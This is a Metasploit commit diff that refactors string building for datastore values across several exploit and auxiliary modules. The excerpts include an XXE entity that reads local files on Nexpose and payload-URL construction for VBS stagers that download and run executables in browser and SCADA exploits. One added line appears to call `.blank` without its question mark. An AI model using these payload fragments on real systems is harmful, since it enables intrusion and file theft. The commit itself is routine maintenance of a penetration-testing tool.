Land rapid7#4709, fixed up some datastore mangling

Tod Beardsley · Tod Beardsley · commit 036cb77dd094 · 2015-02-05T21:22:38.000-06:00
diff --git a/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb b/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb
@@ -74,7 +74,7 @@ def run
 
     xml = '<!DOCTYPE foo ['
     xml << '<!ELEMENT host ANY>'
-    xml << '<!ENTITY xxe SYSTEM "file://' << datastore['FILEPATH'] << '">'
+    xml << %Q{<!ENTITY xxe SYSTEM "file://#{datastore['FILEPATH']}">}
     xml << ']>'
     xml << '<SiteSaveRequest session-id="'
 
diff --git a/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb b/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb
@@ -330,22 +330,17 @@ def dns_send(data,method)
   end
 
   def fix_variables
-    if datastore['OPCODE'] == ""
-      datastore['OPCODE'] = "QUERY,IQUERY,STATUS,UNASSIGNED,NOTIFY,UPDATE"
-    end
-    if datastore['CLASS'] == ""
-      datastore['CLASS'] = "IN,CH,HS,NONE,ANY"
-    end
-    if datastore['RR'] == ""
-      datastore['RR'] = "A,NS,MD,MF,CNAME,SOA,MB,MG,MR,NULL,WKS,PTR,"
-      datastore['RR'] << "HINFO,MINFO,MX,TXT,RP,AFSDB,X25,ISDN,RT,"
-      datastore['RR'] << "NSAP,NSAP-PTR,SIG,KEY,PX,GPOS,AAAA,LOC,NXT,"
-      datastore['RR'] << "EID,NIMLOC,SRV,ATMA,NAPTR,KX,CERT,A6,DNAME,"
-      datastore['RR'] << "SINK,OPT,APL,DS,SSHFP,IPSECKEY,RRSIG,NSEC,"
-      datastore['RR'] << "DNSKEY,DHCID,NSEC3,NSEC3PARAM,HIP,NINFO,RKEY,"
-      datastore['RR'] << "TALINK,SPF,UINFO,UID,GID,UNSPEC,TKEY,TSIG,"
-      datastore['RR'] << "IXFR,AXFR,MAILA,MAILB,*,TA,DLV,RESERVED"
-    end
+    @fuzz_opcode = datastore['OPCODE'].blank? ? "QUERY,IQUERY,STATUS,UNASSIGNED,NOTIFY,UPDATE" : datastore['OPCODE']
+    @fuzz_class  = datastore['CLASS'].blank? ? "IN,CH,HS,NONE,ANY" : datastore['CLASS']
+    fuzz_rr_queries = "A,NS,MD,MF,CNAME,SOA,MB,MG,MR,NULL,WKS,PTR," <<
+      "HINFO,MINFO,MX,TXT,RP,AFSDB,X25,ISDN,RT," <<
+      "NSAP,NSAP-PTR,SIG,KEY,PX,GPOS,AAAA,LOC,NXT," <<
+      "EID,NIMLOC,SRV,ATMA,NAPTR,KX,CERT,A6,DNAME," <<
+      "SINK,OPT,APL,DS,SSHFP,IPSECKEY,RRSIG,NSEC," <<
+      "DNSKEY,DHCID,NSEC3,NSEC3PARAM,HIP,NINFO,RKEY," <<
+      "TALINK,SPF,UINFO,UID,GID,UNSPEC,TKEY,TSIG," <<
+      "IXFR,AXFR,MAILA,MAILB,*,TA,DLV,RESERVED"
+    @fuzz_rr     = datastore['RR'].blank ? fuzz_rr_queries : datastore['RR']
   end
 
   def run_host(ip)
@@ -381,7 +376,7 @@ def run_host(ip)
         if @domain == nil
           print_status("DNS Fuzzer: DOMAIN could be set for health check but not mandatory.")
         end
-        nsopcode=datastore['OPCODE'].split(",")
+        nsopcode=@fuzz_opcode.split(",")
         opcode = setup_opcode(nsopcode)
         opcode.unpack("n*").each do |dnsOpcode|
           1.upto(iter) do
@@ -414,11 +409,11 @@ def run_host(ip)
           nsclass << req[:class]
           nsentry << req[:name]
         end
-        nsopcode=datastore['OPCODE'].split(",")
+        nsopcode=@fuzz_opcode.split(",")
       else
-        nsreq=datastore['RR'].split(",")
-        nsopcode=datastore['OPCODE'].split(",")
-        nsclass=datastore['CLASS'].split(",")
+        nsreq=@fuzz_rr.split(",")
+        nsopcode=@fuzz_opcode.split(",")
+        nsclass=@fuzz_class.split(",")
         begin
           classns = setup_nsclass(nsclass)
           raise ArgumentError, "Invalid CLASS: #{nsclass.inspect}" unless classns
diff --git a/modules/exploits/multi/http/zabbix_script_exec.rb b/modules/exploits/multi/http/zabbix_script_exec.rb
@@ -79,7 +79,7 @@ def exploit
     req = c.request_cgi({
       'method' => 'POST',
       'uri' => '/zabbix/',
-      'data' => 'request=&name=' << datastore['USERNAME'] << '&password=' << datastore['PASSWORD'] << '&enter=Sign+in'
+      'data' => "request=&name=#{datastore['USERNAME']}&password=#{datastore['PASSWORD']}&enter=Sign+in"
     })
 
     login = c.send_recv(req.to_s.sub("Host:", "Host: " << datastore["RHOST"]))
diff --git a/modules/exploits/windows/browser/real_arcade_installerdlg.rb b/modules/exploits/windows/browser/real_arcade_installerdlg.rb
@@ -81,7 +81,7 @@ def on_request_uri(cli, request)
 
     # Payload's URL
     payload_src  = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-    payload_src << ":" << datastore['SRVPORT'] << get_resource() + "/" + @payload_name + ".exe"
+    payload_src << ":#{datastore['SRVPORT']}#{get_resource}/#{@payload_name}.exe"
 
     # Create the stager (download + execute payload)
     stager_name = rand_text_alpha(6) + ".vbs"
diff --git a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
@@ -130,7 +130,7 @@ def on_request_uri(cli, request)
 
     # Payload's URL
     payload_src = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-    payload_src << ":" << datastore['SRVPORT'] << get_resource() + "/" + @payload_name + ".exe"
+    payload_src << ":#{datastore['SRVPORT']}#{get_resource}/#{@payload_name}.exe"
 
     # Create the stager (download + execute payload)
     stager = build_vbs(payload_src)
diff --git a/modules/exploits/windows/scada/scadapro_cmdexe.rb b/modules/exploits/windows/scada/scadapro_cmdexe.rb
@@ -103,7 +103,7 @@ def exploit
     end
 
     payload_src  = lhost
-    payload_src << ":" << datastore['SRVPORT'] << datastore['URIPATH'] << @payload_name << ".exe"
+    payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"
 
     stager_name = rand_text_alpha(6) + ".vbs"
     stager      = build_vbs(payload_src, stager_name)
